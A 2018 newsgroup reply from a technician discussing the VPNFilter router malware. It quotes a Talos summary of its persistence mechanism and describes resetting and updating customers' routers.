On Wed, 30 May 2018 10:19:09 +1000, Clifford Heath
wrote:

Also: "Cisco said part of the code used by VPNFilter can still persist
until the affected device is reset to its factory-default settings."

So a reset actually might be required.

You're right. Here's the source of the Cisco recommendation:
https://blog.talosintelligence.com/2018/05/VPNFilter.html
See "Stage 1 (Persistent Loader)" section:
VPNFilter's stage 1 malware infects devices running firmware
based on Busybox and Linux, and is compiled for several CPU
architectures. The main purpose of these first-stage binaries
is to locate a server providing a more fully featured second
stage, and to download and maintain persistence for this next
stage on infected devices. It is capable of modifying
non-volatile configuration memory (NVRAM) values and adds
itself to crontab, the Linux job scheduler, to achieve
persistence.

So, it looks like I might be doing some reset to defaults and firmware
updates on affected routers. The crontab file is probably in the
firmware. Argh.

Incidentally, of the two customers who reset their routers to
defaults, I was able to recover by walking them through the initial
setup to get their device on the internet, and then restoring their
saved settings, which I save for every router I configure. I didn't
charge either customer if they promised to never do that again.
However, if they're on the affected router list, I'll need to visit
them and update the firmware.


--
Jeff Liebermann
150 Felker St #D http://www.LearnByDestroying.com
Santa Cruz CA 95060 http://802.11junk.com
Skype: JeffLiebermann AE6KS 831-336-2558